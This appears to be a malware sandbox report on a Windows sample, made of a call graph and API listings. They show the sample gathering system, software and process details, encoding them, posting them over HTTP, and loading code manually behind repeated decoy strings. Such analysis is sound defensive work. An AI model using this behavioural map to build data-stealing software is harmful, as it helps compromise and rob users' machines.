lstrcpy 15211->15212 15213 2b2132 15212->15213 15214 2ba9b0 4 API calls 15213->15214 15215 2b2151 15214->15215 15216 2ba8a0 lstrcpy 15215->15216 15217 2b215a 15216->15217 15218 2ba9b0 4 API calls 15217->15218 15219 2b217b 15218->15219 15220 2ba8a0 lstrcpy 15219->15220 15221 2b2184 15220->15221 15815 2b7f60 15221->15815 15224 2ba9b0 4 API calls 15225 2b21a4 15224->15225 15226 2ba8a0 lstrcpy 15225->15226 15227 2b21ad 15226->15227 15228 2ba9b0 4 API calls 15227->15228 15229 2b21cc 15228->15229 15230 2ba8a0 lstrcpy 15229->15230 15231 2b21d5 15230->15231 15232 2ba9b0 4 API calls 15231->15232 15233 2b21f6 15232->15233 15234 2ba8a0 lstrcpy 15233->15234 15235 2b21ff 15234->15235 15828 2b7ed0 GetSystemInfo wsprintfA 15235->15828 15238 2ba9b0 4 API calls 15239 2b221f 15238->15239 15240 2ba8a0 lstrcpy 15239->15240 15241 2b2228 15240->15241 15242 2ba9b0 4 API calls 15241->15242 15243 2b2247 15242->15243 15244 2ba8a0 lstrcpy 15243->15244 15245 2b2250 15244->15245 15246 2ba9b0 4 API calls 15245->15246 15247 2b2270 15246->15247 15248 2ba8a0 lstrcpy 15247->15248 15249 2b2279 15248->15249 15830 2b8100 GetProcessHeap RtlAllocateHeap 15249->15830 15252 2ba9b0 4 API calls 15253 2b2299 15252->15253 15254 2ba8a0 lstrcpy 15253->15254 15255 2b22a2 15254->15255 15256 2ba9b0 4 API calls 15255->15256 15257 2b22c1 15256->15257 15258 2ba8a0 lstrcpy 15257->15258 15259 2b22ca 15258->15259 15260 2ba9b0 4 API calls 15259->15260 15261 2b22eb 15260->15261 15262 2ba8a0 lstrcpy 15261->15262 15263 2b22f4 15262->15263 15836 2b87c0 15263->15836 15266 2ba920 3 API calls 15267 2b231e 15266->15267 15268 2ba8a0 lstrcpy 15267->15268 15269 2b2327 15268->15269 15270 2ba9b0 4 API calls 15269->15270 15271 2b2351 15270->15271 15272 2ba8a0 lstrcpy 15271->15272 15273 2b235a 15272->15273 15274 2ba9b0 4 API calls 15273->15274 15275 2b237a 15274->15275 15276 2ba8a0 lstrcpy 15275->15276 15277 2b2383 15276->15277 15278 2ba9b0 4 API calls 15277->15278 15279 2b23a2 15278->15279 15280 2ba8a0 lstrcpy 15279->15280 15281 2b23ab 15280->15281 15841 2b81f0 15281->15841 15283 2b23c2 15284 2ba920 3 API calls 15283->15284 15285 2b23d5 15284->15285 15286 2ba8a0 lstrcpy 15285->15286 15287 2b23de 15286->15287 15288 2ba9b0 4 API calls 15287->15288 15289 2b240a 15288->15289 15290 2ba8a0 lstrcpy 15289->15290 15291 2b2413 15290->15291 15292 2ba9b0 4 API calls 15291->15292 15293 2b2432 15292->15293 15294 2ba8a0 lstrcpy 15293->15294 15295 2b243b 15294->15295 15296 2ba9b0 4 API calls 15295->15296 15297 2b245c 15296->15297 15298 2ba8a0 lstrcpy 15297->15298 15299 2b2465 15298->15299 15300 2ba9b0 4 API calls 15299->15300 15301 2b2484 15300->15301 15302 2ba8a0 lstrcpy 15301->15302 15303 2b248d 15302->15303 15304 2ba9b0 4 API calls 15303->15304 15305 2b24ae 15304->15305 15306 2ba8a0 lstrcpy 15305->15306 15307 2b24b7 15306->15307 15849 2b8320 15307->15849 15309 2b24d3 15310 2ba920 3 API calls 15309->15310 15311 2b24e6 15310->15311 15312 2ba8a0 lstrcpy 15311->15312 15313 2b24ef 15312->15313 15314 2ba9b0 4 API calls 15313->15314 15315 2b2519 15314->15315 15316 2ba8a0 lstrcpy 15315->15316 15317 2b2522 15316->15317 15318 2ba9b0 4 API calls 15317->15318 15319 2b2543 15318->15319 15320 2ba8a0 lstrcpy 15319->15320 15321 2b254c 15320->15321 15322 2b8320 17 API calls 15321->15322 15323 2b2568 15322->15323 15324 2ba920 3 API calls 15323->15324 15325 2b257b 15324->15325 15326 2ba8a0 lstrcpy 15325->15326 15327 2b2584 15326->15327 15328 2ba9b0 4 API calls 15327->15328 15329 2b25ae 15328->15329 15330 2ba8a0 lstrcpy 15329->15330 15331 2b25b7 15330->15331 15332 2ba9b0 4 API calls 15331->15332 15333 2b25d6 15332->15333 15334 2ba8a0 lstrcpy 15333->15334 15335 2b25df 15334->15335 15336 2ba9b0 4 API calls 15335->15336 15337 2b2600 15336->15337 15338 2ba8a0 lstrcpy 15337->15338 15339 2b2609 15338->15339 15885 2b8680 15339->15885 15341 2b2620 15342 2ba920 3 API calls 15341->15342 15343 2b2633 15342->15343 15344 2ba8a0 lstrcpy 15343->15344 15345 2b263c 15344->15345 15346 2b265a lstrlen 15345->15346 15347 2b266a 15346->15347 15348 2ba740 lstrcpy 15347->15348 15349 2b267c 15348->15349 15350 2a1590 lstrcpy 15349->15350 15351 2b268d 15350->15351 15895 2b5190 15351->15895 15353 2b2699 15353->13785 16083 2baad0 15354->16083 15356 2a5009 InternetOpenUrlA 15360 2a5021 15356->15360 15357 2a502a InternetReadFile 15357->15360 15358 2a50a0 InternetCloseHandle InternetCloseHandle 15359 2a50ec 15358->15359 15359->13789 15360->15357 15360->15358 16084 2a98d0 15361->16084 15363 2b0759 15364 2b0a38 15363->15364 15365 2b077d 15363->15365 15366 2a1590 lstrcpy 15364->15366 15368 2b0799 StrCmpCA 15365->15368 15367 2b0a49 15366->15367 16260 2b0250 15367->16260 15370 2b0843 15368->15370 15371 2b07a8 15368->15371 15374 2b0865 StrCmpCA 15370->15374 15373 2ba7a0 lstrcpy 15371->15373 15375 2b07c3 15373->15375 15376 2b0874 15374->15376 15413 2b096b 15374->15413 15377 2a1590 lstrcpy 15375->15377 15378 2ba740 lstrcpy 15376->15378 15379 2b080c 15377->15379 15381 2b0881 15378->15381 15382 2ba7a0 lstrcpy 15379->15382 15380 2b099c StrCmpCA 15383 2b09ab 15380->15383 15402 2b0a2d 15380->15402 15384 2ba9b0 4 API calls 15381->15384 15385 2b0823 15382->15385 15386 2a1590 lstrcpy 15383->15386 15387 2b08ac 15384->15387 15388 2ba7a0 lstrcpy 15385->15388 15389 2b09f4 15386->15389 15390 2ba920 3 API calls 15387->15390 15391 2b083e 15388->15391 15392 2ba7a0 lstrcpy 15389->15392 15393 2b08b3 15390->15393 16087 2afb00 15391->16087 15395 2b0a0d 15392->15395 15396 2ba9b0 4 API calls 15393->15396 15397 2ba7a0 lstrcpy 15395->15397 15398 2b08ba 15396->15398 15399 2b0a28 15397->15399 15400 2ba8a0 lstrcpy 15398->15400 16203 2b0030 15399->16203 15402->13793 15413->15380 15735 2ba7a0 lstrcpy 15734->15735 15736 2a1683 15735->15736 15737 2ba7a0 lstrcpy 15736->15737 15738 2a1695 15737->15738 15739 2ba7a0 lstrcpy 15738->15739 15740 2a16a7 15739->15740 15741 2ba7a0 lstrcpy 15740->15741 15742 2a15a3 15741->15742 15742->14616 15744 2a47c6 15743->15744 15745 2a4838 lstrlen 15744->15745 15769 2baad0 15745->15769 15747 2a4848 InternetCrackUrlA 15748 2a4867 15747->15748 15748->14693 15750 2ba740 lstrcpy 15749->15750 15751 2b8b74 15750->15751 15752 2ba740 lstrcpy 15751->15752 15753 2b8b82 GetSystemTime 15752->15753 15755 2b8b99 15753->15755 15754 2ba7a0 lstrcpy 15756 2b8bfc 15754->15756 15755->15754 15756->14708 15758 2ba931 15757->15758 15759 2ba988 15758->15759 15761 2ba968 lstrcpy lstrcat 15758->15761 15760 2ba7a0 lstrcpy 15759->15760 15762 2ba994 15760->15762 15761->15759 15762->14711 15763->14826 15765 2a4eee 15764->15765 15766 2a9af9 LocalAlloc 15764->15766 15765->14714 15765->14716 15766->15765 15767 2a9b14 CryptStringToBinaryA 15766->15767 15767->15765 15768 2a9b39 LocalFree 15767->15768 15768->15765 15769->15747 15770->14836 15771->14977 15772->14979 15773->14987 15902 2b77a0 15774->15902 15777 2b1c1e 15777->15069 15778 2b76c6 RegOpenKeyExA 15779 2b76e7 RegQueryValueExA 15778->15779 15780 2b7704 RegCloseKey 15778->15780 15779->15780 15780->15777 15782 2b1c99 15781->15782 15782->15083 15784 2b1e09 15783->15784 15784->15125 15786 2b7a9a wsprintfA 15785->15786 15787 2b1e84 15785->15787 15786->15787 15787->15139 15789 2b7b4d 15788->15789 15790 2b1efe 15788->15790 15909 2b8d20 LocalAlloc CharToOemW 15789->15909 15790->15153 15793 2ba740 lstrcpy 15792->15793 15794 2b7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15793->15794 15801 2b7c25 15794->15801 15795 2b7d18 15797 2b7d28 15795->15797 15798 2b7d1e LocalFree 15795->15798 15796 2b7c46 GetLocaleInfoA 15796->15801 15799 2ba7a0 lstrcpy 15797->15799 15798->15797 15802 2b7d37 15799->15802 15800 2ba9b0 lstrcpy lstrlen lstrcpy lstrcat 15800->15801 15801->15795 15801->15796 15801->15800 15803 2ba8a0 lstrcpy 15801->15803 15802->15166 15803->15801 15805 2b2008 15804->15805 15805->15181 15807 2b9493 GetModuleFileNameExA CloseHandle 15806->15807 15808 2b94b5 15806->15808 15807->15808 15809 2ba740 lstrcpy 15808->15809 15810 2b2091 15809->15810 15810->15196 15812 2b7e68 RegQueryValueExA 15811->15812 15813 2b2119 15811->15813 15814 2b7e8e RegCloseKey 15812->15814 15813->15210 15814->15813 15816 2b7fb9 GetLogicalProcessorInformationEx 15815->15816 15817 2b7fd8 GetLastError 15816->15817 15823 2b8029 15816->15823 15818 2b8022 15817->15818 15827 2b7fe3 15817->15827 15819 2b2194 15818->15819 15822 2b89f0 2 API calls 15818->15822 15819->15224 15822->15819 15824 2b89f0 2 API calls 15823->15824 15825 2b807b 15824->15825 15825->15818 15826 2b8084 wsprintfA 15825->15826 15826->15819 15827->15816 15827->15819 15910 2b89f0 15827->15910 15913 2b8a10 GetProcessHeap RtlAllocateHeap 15827->15913 15829 2b220f 15828->15829 15829->15238 15831 2b89b0 15830->15831 15832 2b814d GlobalMemoryStatusEx 15831->15832 15833 2b8163 __aulldiv 15832->15833 15834 2b819b wsprintfA 15833->15834 15835 2b2289 15834->15835 15835->15252 15837 2b87fb GetProcessHeap RtlAllocateHeap wsprintfA 15836->15837 15839 2ba740 lstrcpy 15837->15839 15840 2b230b 15839->15840 15840->15266 15842 2ba740 lstrcpy 15841->15842 15848 2b8229 15842->15848 15843 2b8263 15844 2ba7a0 lstrcpy 15843->15844 15846 2b82dc 15844->15846 15845 2ba9b0 lstrcpy lstrlen lstrcpy lstrcat 15845->15848 15846->15283 15847 2ba8a0 lstrcpy 15847->15848 15848->15843 15848->15845 15848->15847 15850 2ba740 lstrcpy 15849->15850 15851 2b835c RegOpenKeyExA 15850->15851 15852 2b83ae 15851->15852 15853 2b83d0 15851->15853 15854 2ba7a0 lstrcpy 15852->15854 15855 2b83f8 RegEnumKeyExA 15853->15855 15856 2b8613 RegCloseKey 15853->15856 15860 2b83bd 15854->15860 15857 2b843f wsprintfA RegOpenKeyExA 15855->15857 15858 2b860e 15855->15858 15859 2ba7a0 lstrcpy 15856->15859 15861 2b84c1 RegQueryValueExA 15857->15861 15862 2b8485 RegCloseKey RegCloseKey 15857->15862 15858->15856 15859->15860 15860->15309 15864 2b84fa lstrlen 15861->15864 15865 2b8601 RegCloseKey 15861->15865 15863 2ba7a0 lstrcpy 15862->15863 15863->15860 15864->15865 15866 2b8510 15864->15866 15865->15858 15867 2ba9b0 4 API calls 15866->15867 15868 2b8527 15867->15868 15869 2ba8a0 lstrcpy 15868->15869 15870 2b8533 15869->15870 15871 2ba9b0 4 API calls 15870->15871 15872 2b8557 15871->15872 15873 2ba8a0 lstrcpy 15872->15873 15874 2b8563 15873->15874 15875 2b856e RegQueryValueExA 15874->15875 15875->15865 15876 2b85a3 15875->15876 15877 2ba9b0 4 API calls 15876->15877 15878 2b85ba 15877->15878 15879 2ba8a0 lstrcpy 15878->15879 15880 2b85c6 15879->15880 15881 2ba9b0 4 API calls 15880->15881 15882 2b85ea 15881->15882 15883 2ba8a0 lstrcpy 15882->15883 15884 2b85f6 15883->15884 15884->15865 15886 2ba740 lstrcpy 15885->15886 15887 2b86bc CreateToolhelp32Snapshot Process32First 15886->15887 15888 2b86e8 Process32Next 15887->15888 15889 2b875d CloseHandle 15887->15889 15888->15889 15890 2b86fd 15888->15890 15891 2ba7a0 lstrcpy 15889->15891 15890->15888 15893 2ba9b0 lstrcpy lstrlen lstrcpy lstrcat 15890->15893 15894 2ba8a0 lstrcpy 15890->15894 15892 2b8776 15891->15892 15892->15341 15893->15890 15894->15890 15896 2ba7a0 lstrcpy 15895->15896 15897 2b51b5 15896->15897 15898 2a1590 lstrcpy 15897->15898 15899 2b51c6 15898->15899 15914 2a5100 15899->15914 15901 2b51cf 15901->15353 15905 2b7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15902->15905 15904 2b76b9 15904->15777 15904->15778 15906 2b7780 RegCloseKey 15905->15906 15907 2b7765 RegQueryValueExA 15905->15907 15908 2b7793 15906->15908 15907->15906 15908->15904 15909->15790 15911 2b89f9 GetProcessHeap HeapFree 15910->15911 15912 2b8a0c 15910->15912 15911->15912 15912->15827 15913->15827 15915 2ba7a0 lstrcpy 15914->15915 15916 2a5119 15915->15916 15917 2a47b0 2 API calls 15916->15917 15918 2a5125 15917->15918 16074 2b8ea0 15918->16074 15920 2a5184 15921 2a5192 lstrlen 15920->15921 15922 2a51a5 15921->15922 15923 2b8ea0 4 API calls 15922->15923 15924 2a51b6 15923->15924 15925 2ba740 lstrcpy 15924->15925 15926 2a51c9 15925->15926 15927 2ba740 lstrcpy 15926->15927 15928 2a51d6 15927->15928 15929 2ba740 lstrcpy 15928->15929 15930 2a51e3 15929->15930 15931 2ba740 lstrcpy 15930->15931 15932 2a51f0 15931->15932 15933 2ba740 lstrcpy 15932->15933 15934 2a51fd InternetOpenA StrCmpCA 15933->15934 15935 2a522f 15934->15935 15936 2a58c4 InternetCloseHandle 15935->15936 15937 2b8b60 3 API calls 15935->15937 15943 2a58d9 codecvt 15936->15943 15938 2a524e 15937->15938 15939 2ba920 3 API calls 15938->15939 15940 2a5261 15939->15940 15941 2ba8a0 lstrcpy 15940->15941 15942 2a526a 15941->15942 15944 2ba9b0 4 API calls 15942->15944 15947 2ba7a0 lstrcpy 15943->15947 15945 2a52ab 15944->15945 15946 2ba920 3 API calls 15945->15946 15948 2a52b2 15946->15948 15955 2a5913 15947->15955 15949 2ba9b0 4 API calls 15948->15949 15950 2a52b9 15949->15950 15951 2ba8a0 lstrcpy 15950->15951 15952 2a52c2 15951->15952 15953 2ba9b0 4 API calls 15952->15953 15954 2a5303 15953->15954 15956 2ba920 3 API calls 15954->15956 15955->15901 15957 2a530a 15956->15957 15958 2ba8a0 lstrcpy 15957->15958 15959 2a5313 15958->15959 15960 2a5329 InternetConnectA 15959->15960 15960->15936 15961 2a5359 HttpOpenRequestA 15960->15961 15963 2a58b7 InternetCloseHandle 15961->15963 15964 2a53b7 15961->15964 15963->15936 15965 2ba9b0 4 API calls 15964->15965 15966 2a53cb 15965->15966 15967 2ba8a0 lstrcpy 15966->15967 15968 2a53d4 15967->15968 15969 2ba920 3 API calls 15968->15969 15970 2a53f2 15969->15970 15971 2ba8a0 lstrcpy 15970->15971 15972 2a53fb 15971->15972 15973 2ba9b0 4 API calls 15972->15973 15974 2a541a 15973->15974 15975 2ba8a0 lstrcpy 15974->15975 15976 2a5423 15975->15976 15977 2ba9b0 4 API calls 15976->15977 15978 2a5444 15977->15978 15979 2ba8a0 lstrcpy 15978->15979 15980 2a544d 15979->15980 15981 2ba9b0 4 API calls 15980->15981 15982 2a546e 15981->15982 16075 2b8ead CryptBinaryToStringA 16074->16075 16079 2b8ea9 16074->16079 16076 2b8ece GetProcessHeap RtlAllocateHeap 16075->16076 16075->16079 16077 2b8ef4 codecvt 16076->16077 16076->16079 16078 2b8f05 CryptBinaryToStringA 16077->16078 16078->16079 16079->15920 16083->15356 16326 2a9880 16084->16326 16086 2a98e1 16086->15363 16088 2ba740 lstrcpy 16087->16088 16261 2ba740 lstrcpy 16260->16261 16262 2b0266 16261->16262 16263 2b8de0 2 API calls 16262->16263 16264 2b027b 16263->16264 16265 2ba920 3 API calls 16264->16265 16266 2b028b 16265->16266 16267 2ba8a0 lstrcpy 16266->16267 16268 2b0294 16267->16268 16269 2ba9b0 4 API calls 16268->16269 16327 2a988e 16326->16327 16330 2a6fb0 16327->16330 16329 2a98ad codecvt 16329->16086 16333 2a6d40 16330->16333 16334 2a6d63 16333->16334 16347 2a6d59 16333->16347 16349 2a6530 16334->16349 16338 2a6dbe 16338->16347 16359 2a69b0 16338->16359 16340 2a6e2a 16341 2a6ee6 VirtualFree 16340->16341 16343 2a6ef7 16340->16343 16340->16347 16341->16343 16342 2a6f41 16346 2b89f0 2 API calls 16342->16346 16342->16347 16343->16342 16344 2a6f38 16343->16344 16345 2a6f26 FreeLibrary 16343->16345 16348 2b89f0 2 API calls 16344->16348 16345->16343 16346->16347 16347->16329 16348->16342 16350 2a6542 16349->16350 16352 2a6549 16350->16352 16369 2b8a10 GetProcessHeap RtlAllocateHeap 16350->16369 16352->16347 16353 2a6660 16352->16353 16356 2a668f VirtualAlloc 16353->16356 16355 2a6730 16357 2a673c 16355->16357 16358 2a6743 VirtualAlloc 16355->16358 16356->16355 16356->16357 16357->16338 16358->16357 16360 2a69c9 16359->16360 16362 2a69d5 16359->16362 16361 2a6a09 LoadLibraryA 16360->16361 16360->16362 16361->16362 16363 2a6a32 16361->16363 16362->16340 16366 2a6ae0 16363->16366 16370 2b8a10 GetProcessHeap RtlAllocateHeap 16363->16370 16365 2a6ba8 GetProcAddress 16365->16362 16365->16366 16366->16362 16366->16365 16367 2b89f0 2 API calls 16367->16366 16368 2a6a8b 16368->16362 16368->16367 16369->16352 16370->16368

                  Executed Functions

                  Function 002B9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 660 2b9860-2b9874 call 2b9750 663 2b987a-2b9a8e call 2b9780 GetProcAddress * 21 660->663 664 2b9a93-2b9af2 LoadLibraryA * 5 660->664 663->664 666 2b9b0d-2b9b14 664->666 667 2b9af4-2b9b08 GetProcAddress 664->667 669 2b9b46-2b9b4d 666->669 670 2b9b16-2b9b41 GetProcAddress * 2 666->670 667->666 671 2b9b68-2b9b6f 669->671 672 2b9b4f-2b9b63 GetProcAddress 669->672 670->669 673 2b9b89-2b9b90 671->673 674 2b9b71-2b9b84 GetProcAddress 671->674 672->671 675 2b9b92-2b9bbc GetProcAddress * 2 673->675 676 2b9bc1-2b9bc2 673->676 674->673 675->676
                  APIs
                  • GetProcAddress.KERNEL32(76210000,00D51770), ref: 002B98A1
                  • GetProcAddress.KERNEL32(76210000,00D51788), ref: 002B98BA
                  • GetProcAddress.KERNEL32(76210000,00D516E0), ref: 002B98D2
                  • GetProcAddress.KERNEL32(76210000,00D516B0), ref: 002B98EA
                  • GetProcAddress.KERNEL32(76210000,00D51698), ref: 002B9903
                  • GetProcAddress.KERNEL32(76210000,00D58B78), ref: 002B991B
                  • GetProcAddress.KERNEL32(76210000,00D45428), ref: 002B9933
                  • GetProcAddress.KERNEL32(76210000,00D45448), ref: 002B994C
                  • GetProcAddress.KERNEL32(76210000,00D51650), ref: 002B9964
                  • GetProcAddress.KERNEL32(76210000,00D517B8), ref: 002B997C
                  • GetProcAddress.KERNEL32(76210000,00D51668), ref: 002B9995
                  • GetProcAddress.KERNEL32(76210000,00D517D0), ref: 002B99AD
                  • GetProcAddress.KERNEL32(76210000,00D45508), ref: 002B99C5
                  • GetProcAddress.KERNEL32(76210000,00D515C0), ref: 002B99DE
                  • GetProcAddress.KERNEL32(76210000,00D51500), ref: 002B99F6
                  • GetProcAddress.KERNEL32(76210000,00D45648), ref: 002B9A0E
                  • GetProcAddress.KERNEL32(76210000,00D51530), ref: 002B9A27
                  • GetProcAddress.KERNEL32(76210000,00D51548), ref: 002B9A3F
                  • GetProcAddress.KERNEL32(76210000,00D45528), ref: 002B9A57
                  • GetProcAddress.KERNEL32(76210000,00D51830), ref: 002B9A70
                  • GetProcAddress.KERNEL32(76210000,00D453A8), ref: 002B9A88
                  • LoadLibraryA.KERNEL32(00D51848,?,002B6A00), ref: 002B9A9A
                  • LoadLibraryA.KERNEL32(00D51860,?,002B6A00), ref: 002B9AAB
                  • LoadLibraryA.KERNEL32(00D51878,?,002B6A00), ref: 002B9ABD
                  • LoadLibraryA.KERNEL32(00D51890,?,002B6A00), ref: 002B9ACF
                  • LoadLibraryA.KERNEL32(00D518A8,?,002B6A00), ref: 002B9AE0
                  • GetProcAddress.KERNEL32(75B30000,00D517E8), ref: 002B9B02
                  • GetProcAddress.KERNEL32(751E0000,00D51800), ref: 002B9B23
                  • GetProcAddress.KERNEL32(751E0000,00D51818), ref: 002B9B3B
                  • GetProcAddress.KERNEL32(76910000,00D59058), ref: 002B9B5D
                  • GetProcAddress.KERNEL32(75670000,00D45668), ref: 002B9B7E
                  • GetProcAddress.KERNEL32(77310000,00D58C38), ref: 002B9B9F
                  • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 002B9BB6
                  Strings
                  • NtQueryInformationProcess, xrefs: 002B9BAA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: NtQueryInformationProcess
                  • API String ID: 2238633743-2781105232
                  • Opcode ID: ecbc276302ffd0b73b0971b02ca6b975f0f071cc8515504d05a1c1377ab5474d
                  • Instruction ID: 0f20b7a6b5f7ebdc5d6d9115eec3f8b214e4ca0ddac888bc1cf975c2330b1b23
                  • Opcode Fuzzy Hash: ecbc276302ffd0b73b0971b02ca6b975f0f071cc8515504d05a1c1377ab5474d
                  • Instruction Fuzzy Hash: 61A17EB95002C09FC354EFA8EDC89567BF9F74C301705853EE605CB266D639B8A5CB1A
                  Function 002A45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 764 2a45c0-2a4695 RtlAllocateHeap 781 2a46a0-2a46a6 764->781 782 2a474f-2a47a9 VirtualProtect 781->782 783 2a46ac-2a474a 781->783 783->781
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002A460F
                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 002A479C
                  Strings
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A45C7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A473F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A45DD
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A4683
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A4734
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A4622
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A4617
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A4662
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A475A
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A45F3
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A46AC
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A45D2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A45E8
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A477B
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A462D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A46B7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A471E
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A4713
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A4643
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A4657
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A4678
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A46CD
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A466D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A474F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A46D8
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A4729
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A4765
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A46C2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A4770
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A4638
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
